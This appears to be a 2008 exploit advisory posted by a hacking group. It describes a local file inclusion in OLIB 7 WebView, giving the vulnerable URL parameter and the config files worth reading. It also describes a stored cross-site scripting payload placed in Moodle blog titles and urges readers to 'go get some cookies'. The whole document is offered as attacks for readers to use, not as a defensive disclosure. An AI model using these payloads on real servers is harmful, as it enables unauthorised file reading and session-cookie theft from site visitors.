Security Advisory for 'OLIB 7 Webview'
This software is apart of Moodle.
Software - OLIB 7 WebView v2.5.1.1
Exploit - LFI
Severity - High
Author - ZeN
website - http://dusecurity.com/
Date - 2nd October 2008
DUSecurity Team / DarkCode
Exploit >
http://olib.site.com/cgi/?session=[session_key]&infile=[LFI]
files in dir - get_settings.ini, setup.ini(contains config file locations), text.ini
Info - You need to login to get a valid session key.
------------------
Extraz :
Moodle Permanent XSS
In Moodle blogging system, simply make a new blog entry with the title
<script>alert()</script>
Now everyone that visits the bloggins system with execute your XSS.
Go get some cookies =D
Enjoy!
------------------
Shouts :-
DUSecurity.com
DarkCode.me
iWannaHack
WL-Group